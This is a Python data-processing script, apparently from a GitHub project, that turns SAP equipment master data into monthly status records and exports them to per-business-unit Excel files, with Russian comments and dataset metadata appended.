master_eo_df_temp_eo = master_eo_df.loc[master_eo_df['temp_eo_code_status']=='temp_eo_code']
indexes_temp_eo = list(master_eo_df_temp_eo.index.values)
# print(master_eo_df_temp_eo['temp_eo_code'])
# print(list(master_eo_df_temp_eo.loc[indexes_temp_eo, ['temp_eo_code']]))
master_eo_df.loc[indexes_temp_eo, ['eo_code']] = master_eo_df_temp_eo['temp_eo_code']
# print(master_eo_df.loc[indexes_temp_eo, ['eo_code']])
# print('должен быть список', master_eo_df.loc[indexes_temp_eo, ['eo_code']])
master_eo_df = master_eo_df.loc[master_eo_df['head_type']=='head']
master_eo_df['operation_start_date'] = pd.to_datetime(master_eo_df['operation_start_date'])
master_eo_df['operation_start_date_month'] = ((master_eo_df['operation_start_date'] + pd.offsets.MonthEnd(0) - pd.offsets.MonthBegin(1)).dt.floor('d'))
master_eo_df['sap_planned_finish_operation_date'] = pd.to_datetime(master_eo_df['sap_planned_finish_operation_date'])
master_eo_df['operation_finish_date_sap_upd'] = pd.to_datetime(master_eo_df['operation_finish_date_sap_upd'])
# джойним данные из файла с мастер-данными
be_master_data = pd.merge(master_eo_df, be_eo_data, on='eo_code', how='left')
#### обновление даты завершения из колонки Итерации
for iteration, iteration_rus in iterations_dict.items():
be_master_data[iteration] = pd.to_datetime(be_master_data[iteration])
be_master_data[iteration].fillna(date_time_plug, inplace = True)
be_master_data['operation_finish_date'] = be_master_data['operation_finish_date_sap_upd']
be_master_data['operation_finish_date'] = be_master_data['operation_finish_date'].dt.date
be_master_data['operation_finish_date'] = be_master_data['operation_finish_date_sap_upd']
be_master_data['operation_finish_date'] = be_master_data['operation_finish_date'].dt.date
be_master_data[iteration] = be_master_data[iteration].dt.date
be_master_data_temp = be_master_data.loc[be_master_data[iteration]!=date_time_plug.date()]
indexes = list(be_master_data_temp.index.values)
be_master_data.loc[indexes, ['operation_finish_date']] = be_master_data_temp[iteration]
be_master_data['operation_finish_date'] = pd.to_datetime(be_master_data['operation_finish_date'])
be_master_data['operation_finish_date_month'] = ((be_master_data['operation_finish_date'] + pd.offsets.MonthEnd(0) - pd.offsets.MonthBegin(1)).dt.floor('d'))
result_data_list = []
i=0
lenght = len(be_master_data)
be_master_data['repair_start_date'].fillna(date_time_plug, inplace = True)
be_master_data['repair_finish_date'].fillna(date_time_plug, inplace = True)
be_master_data['os'].fillna(plug, inplace = True)
# be_master_data.to_csv('temp_data/be_master_data_delete.csv')
be_master_data = be_master_data.loc[be_master_data['custom_eo_status'] != 'delete']
for row in be_master_data.itertuples():
i=i+1
# print("eo ", ", ", i, " из ", lenght)
eo_code = getattr(row, 'eo_code')
be_code = getattr(row, 'be_code')
be_description = getattr(row, 'be_description')
eo_class_code = getattr(row, 'eo_class_code')
eo_class_description = getattr(row, 'eo_class_description')
eo_model_name = getattr(row, 'eo_model_name')
# eo_model_id = getattr(row, 'eo_model_id')
eo_category_spec = getattr(row, 'eo_category_spec')
type_tehniki = getattr(row, 'type_tehniki')
marka_oborudovania = getattr(row, 'marka_oborudovania')
eo_description = getattr(row, "eo_description")
gar_no = getattr(row, "gar_no")
constr_type = getattr(row, "constr_type")
constr_type_descr = getattr(row, "constr_type_descr")
os = getattr(row, "os")
# operation_status_rus = getattr(row, "operation_status")
sap_user_status = getattr(row, "sap_user_status")
sap_system_status = getattr(row, "sap_system_status")
cost_center = getattr(row, "cost_center")
operation_status_from_file = getattr(row, "operation_status") # статус, полученный из файла
operation_start_date = getattr(row, 'operation_start_date')
operation_start_date_month = getattr(row, 'operation_start_date_month')
expected_operation_period_years = getattr(row, 'expected_operation_period_years')
operation_finish_date_calc = getattr(row, 'operation_finish_date_calc')
sap_planned_finish_operation_date = getattr(row, 'sap_planned_finish_operation_date')
operation_finish_date_sap_upd = getattr(row, 'operation_finish_date_sap_upd')
# operation_finish_date_update_iteration = getattr(row, iteration)
operation_finish_date = getattr(row, 'operation_finish_date')
operation_finish_date_month = getattr(row, 'operation_finish_date_month')
conservation_start_date = getattr(row, 'conservation_start_date')
repair_start_date = getattr(row, 'repair_start_date')
repair_finish_date = getattr(row, 'repair_finish_date')
custom_eo_status = getattr(row, 'custom_eo_status')
# сначала определяем статус ввода в эксплуатацию
status_condition_dict = {
"new":"Ввод нового",
"on_balance":"На балансе",
"conservation":"Консервация",
"remake":"Переоборудование",
"out":"План на вывод",
"in_operation":"Эксплуатация",
"out_of_order":"Неисправно"
}
for status_condition, status_condition_rus in status_condition_dict.items():
if status_condition == "on_balance":
if sap_system_status not in sap_system_status_ban_list:
time_operation_point_date = operation_start_date
# первый день в месяце
time_operation_point_date = time_operation_point_date.replace(day=1)
while time_operation_point_date <= operation_finish_date:
temp_dict = {}
temp_dict['eo_code'] = eo_code
temp_dict['be_code'] = be_code
temp_dict['be_description'] = be_description
temp_dict['eo_class_code'] = eo_class_code
temp_dict['eo_class_description'] = eo_class_description
temp_dict['eo_model_name'] = eo_model_name
temp_dict['eo_category_spec'] = eo_category_spec
temp_dict['type_tehniki'] = type_tehniki
temp_dict['marka_oborudovania'] = marka_oborudovania
temp_dict['cost_center'] = cost_center
if os != 'plug':
temp_dict['os'] = os
temp_dict['eo_description'] = eo_description
temp_dict['sap_system_status'] = sap_system_status
temp_dict['sap_user_status'] = sap_user_status
temp_dict['operation_start_date'] = operation_start_date
temp_dict['operation_finish_date'] = operation_finish_date
temp_dict['operation_status'] = "На балансе"
temp_dict['qty'] = 1
temp_dict['На балансе'] = 1
temp_dict['month_date'] = time_operation_point_date
result_data_list.append(temp_dict)
time_operation_point_date = time_operation_point_date + relativedelta(months=1)
if status_condition == "in_operation":
if sap_user_status not in sap_user_status_cons_status_list and \
operation_status_from_file != "Консервация" and \
sap_system_status not in sap_system_status_ban_list:
# operation_start_date <= datetime.strptime('31.12.2023', '%d.%m.%Y') and \
# operation_finish_date >= datetime.strptime('1.1.2022', '%d.%m.%Y'):
time_operation_point_date = operation_start_date
# первый день в месяце
time_operation_point_date = time_operation_point_date.replace(day=1)
# if eo_code == '100000065592':
while time_operation_point_date <= operation_finish_date:
temp_dict = {}
temp_dict['eo_code'] = eo_code
temp_dict['be_code'] = be_code
temp_dict['be_description'] = be_description
temp_dict['eo_class_code'] = eo_class_code
temp_dict['eo_class_description'] = eo_class_description
temp_dict['eo_model_name'] = eo_model_name
temp_dict['eo_category_spec'] = eo_category_spec
temp_dict['type_tehniki'] = type_tehniki
temp_dict['marka_oborudovania'] = marka_oborudovania
temp_dict['cost_center'] = cost_center
if os != 'plug':
temp_dict['os'] = os
temp_dict['eo_description'] = eo_description
temp_dict['sap_system_status'] = sap_system_status
temp_dict['sap_user_status'] = sap_user_status
temp_dict['operation_start_date'] = operation_start_date
temp_dict['operation_finish_date'] = operation_finish_date
temp_dict['operation_status'] = "Эксплуатация"
temp_dict['qty'] = 1
temp_dict['Эксплуатация'] = 1
# print("time_operation_point_date: ", time_operation_point_date)
# print("eo_code: ", eo_code, "operation_start_date: ", operation_start_date, "operation_finish_date: ", operation_finish_date)
# print(time_operation_point)
# if time_operation_point_date >=datetime.strptime('1.1.2022', '%d.%m.%Y'): #and \
# time_operation_point_date <= datetime.strptime('31.12.2023', '%d.%m.%Y'):
# print(time_operation_point)
temp_dict['month_date'] = time_operation_point_date
age = (time_operation_point_date - operation_start_date).days / 365.25
temp_dict['age'] = age
temp_dict['diagram_eo_count_in_operation'] = eo_code
temp_dict['diagram_year'] = time_operation_point_date.year
# print("time_operation_point_date: ", time_operation_point_date)
# print("eo_code: ", eo_code, "operation_start_date: ", operation_start_date, "operation_finish_date: ", operation_finish_date)
# print(temp_dict)
# if repair_start_date == date_time_plug:
# result_data_list.append(temp_dict)
if repair_start_date == date_time_plug:
result_data_list.append(temp_dict)
elif repair_start_date != date_time_plug and time_operation_point_date < repair_start_date:
result_data_list.append(temp_dict)
elif repair_start_date != date_time_plug and time_operation_point_date > repair_finish_date:
result_data_list.append(temp_dict)
else:
if eo_code == '100000072785':
print(eo_code, "time_operation_point_date: ", time_operation_point_date, " repair_start_date: ", repair_start_date, " repair_finish_date:", repair_finish_date)
# and repair_start_date <= operation_finish_date and time_operation_point_date <= repair_start_date:
# result_data_list.append(temp_dict)
# elif repair_start_date != date_time_plug and repair_start_date <= operation_finish_date and time_operation_point_date >= repair_finish_date:
# result_data_list.append(temp_dict)
# result_data_list.append(temp_dict)
time_operation_point_date = time_operation_point_date + relativedelta(months=1)
if status_condition == "conservation":
if (sap_user_status in sap_user_status_cons_status_list or \
operation_status_from_file == "Консервация") and \
sap_system_status not in sap_system_status_ban_list:
# operation_start_date <= datetime.strptime('31.12.2023', '%d.%m.%Y') and \
# operation_finish_date >= datetime.strptime('1.1.2022', '%d.%m.%Y'):
time_operation_point_date = conservation_start_date
conservation_finish_date = operation_finish_date
# первый день в месяце
time_operation_point_date = time_operation_point_date.replace(day=1)
# if eo_code == '100000065592':
while time_operation_point_date <= conservation_finish_date:
temp_dict = {}
temp_dict['eo_code'] = eo_code
temp_dict['be_code'] = be_code
temp_dict['be_description'] = be_description
temp_dict['eo_class_code'] = eo_class_code
temp_dict['eo_class_description'] = eo_class_description
temp_dict['eo_model_name'] = eo_model_name
temp_dict['eo_category_spec'] = eo_category_spec
temp_dict['type_tehniki'] = type_tehniki
temp_dict['marka_oborudovania'] = marka_oborudovania
temp_dict['cost_center'] = cost_center
if os != 'plug':
temp_dict['os'] = os
temp_dict['eo_description'] = eo_description
temp_dict['sap_system_status'] = sap_system_status
temp_dict['sap_user_status'] = sap_user_status
temp_dict['operation_start_date'] = operation_start_date
temp_dict['operation_finish_date'] = operation_finish_date
temp_dict['conservation_start_date'] = conservation_start_date
temp_dict['conservation_finish_date'] = conservation_finish_date
temp_dict['operation_status'] = "Консервация"
temp_dict['qty'] = 1
temp_dict['Консервация'] = 1
temp_dict['month_date'] = time_operation_point_date
result_data_list.append(temp_dict)
time_operation_point_date = time_operation_point_date + relativedelta(months=1)
if status_condition == "new":
# проверяем чтобы ео не была в консервации и в удаленных
if sap_user_status not in sap_user_status_cons_status_list and \
sap_system_status not in sap_system_status_ban_list:
temp_dict = {}
temp_dict['eo_code'] = eo_code
temp_dict['be_code'] = be_code
temp_dict['be_description'] = be_description
temp_dict['eo_class_code'] = eo_class_code
temp_dict['eo_class_description'] = eo_class_description
temp_dict['eo_model_name'] = eo_model_name
temp_dict['eo_category_spec'] = eo_category_spec
temp_dict['type_tehniki'] = type_tehniki
temp_dict['marka_oborudovania'] = marka_oborudovania
temp_dict['cost_center'] = cost_center
if os != 'plug':
temp_dict['os'] = os
temp_dict['eo_description'] = eo_description
temp_dict['sap_system_status'] = sap_system_status
temp_dict['sap_user_status'] = sap_user_status
temp_dict['operation_start_date'] = operation_start_date
temp_dict['operation_finish_date'] = operation_finish_date
temp_dict['month_date'] = operation_start_date_month
temp_dict['operation_status'] = "Ввод нового"
temp_dict['qty'] = 1
temp_dict['Ввод нового'] = 1
result_data_list.append(temp_dict)
elif status_condition == "out":
if sap_system_status not in sap_system_status_ban_list:
temp_dict = {}
temp_dict['eo_code'] = eo_code
temp_dict['be_code'] = be_code
temp_dict['be_description'] = be_description
temp_dict['eo_class_code'] = eo_class_code
temp_dict['eo_class_description'] = eo_class_description
temp_dict['eo_model_name'] = eo_model_name
temp_dict['eo_category_spec'] = eo_category_spec
temp_dict['type_tehniki'] = type_tehniki
temp_dict['marka_oborudovania'] = marka_oborudovania
temp_dict['cost_center'] = cost_center
if os != 'plug':
temp_dict['os'] = os
temp_dict['eo_description'] = eo_description
temp_dict['sap_system_status'] = sap_system_status
temp_dict['sap_user_status'] = sap_user_status
temp_dict['operation_start_date'] = operation_start_date
temp_dict['operation_finish_date'] = operation_finish_date
temp_dict['month_date'] = operation_finish_date_month
temp_dict['operation_status'] = "План на вывод"
temp_dict['qty'] = -1
temp_dict['План на вывод'] = -1
result_data_list.append(temp_dict)
if status_condition == "out_of_order":
if sap_system_status not in sap_system_status_ban_list:
time_operation_point_date = operation_start_date
# первый день в месяце
time_operation_point_date = time_operation_point_date.replace(day=1)
if repair_start_date != date_time_plug and repair_start_date <= operation_finish_date:
while time_operation_point_date <= operation_finish_date:
temp_dict = {}
temp_dict['eo_code'] = eo_code
temp_dict['be_code'] = be_code
temp_dict['be_description'] = be_description
temp_dict['eo_class_code'] = eo_class_code
temp_dict['eo_class_description'] = eo_class_description
temp_dict['eo_model_name'] = eo_model_name
temp_dict['eo_category_spec'] = eo_category_spec
temp_dict['type_tehniki'] = type_tehniki
temp_dict['marka_oborudovania'] = marka_oborudovania
temp_dict['cost_center'] = cost_center
if os != 'plug':
temp_dict['os'] = os
temp_dict['eo_description'] = eo_description
temp_dict['sap_system_status'] = sap_system_status
temp_dict['sap_user_status'] = sap_user_status
temp_dict['operation_start_date'] = operation_start_date
temp_dict['operation_finish_date'] = operation_finish_date
temp_dict['operation_status'] = "Неисправен"
temp_dict['qty'] = 1
temp_dict['Неисправен'] = 1
temp_dict['month_date'] = time_operation_point_date
if time_operation_point_date >= repair_start_date and time_operation_point_date <= repair_finish_date:
result_data_list.append(temp_dict)
time_operation_point_date = time_operation_point_date + relativedelta(months=1)
iter_df_temp = pd.DataFrame(result_data_list)
iter_df_temp['eo_count'] = iter_df_temp['eo_code']
# режем результат по началу 22-го года
iter_df_temp = iter_df_temp.loc[iter_df_temp['month_date']>=datetime.strptime('1.1.2022', '%d.%m.%Y')]
# iter_df_temp = iter_df_temp.rename(columns=master_data_to_ru_columns)
iter_df_temp.reset_index()
list_of_be = list(set(iter_df_temp['be_code']))
# list_of_be = [1100]
for be_code in list_of_be:
df = iter_df_temp.loc[iter_df_temp['be_code']==be_code]
# iter_df_temp["month_date"] = iter_df_temp["month_date"].dt.strftime("%d.%m.%Y")
wb = openpyxl.Workbook(write_only=True)
ws = wb.create_sheet("Sheet1")
i=0
print(be_code, ": ", len(df))
df = df.rename(columns=master_data_to_ru_columns)
for r in dataframe_to_rows(df, index=False, header=True):
i=i+1
# print(i, " из ", lenght)
ws.append(r)
wb.save(f"temp_data/df_{be_code}.xlsx")
# if eo_code == '100000061761':
# print(eo_code) | Zhenya1975/bdo_v41 | functions/read_be_eo_xlsx_file_v5.py | read_be_eo_xlsx_file_v5.py | py | 24,681 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "extensions.extensions.db",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "extensions.extensions",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 15,
"usage_type": "call"
},
{
"ap... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.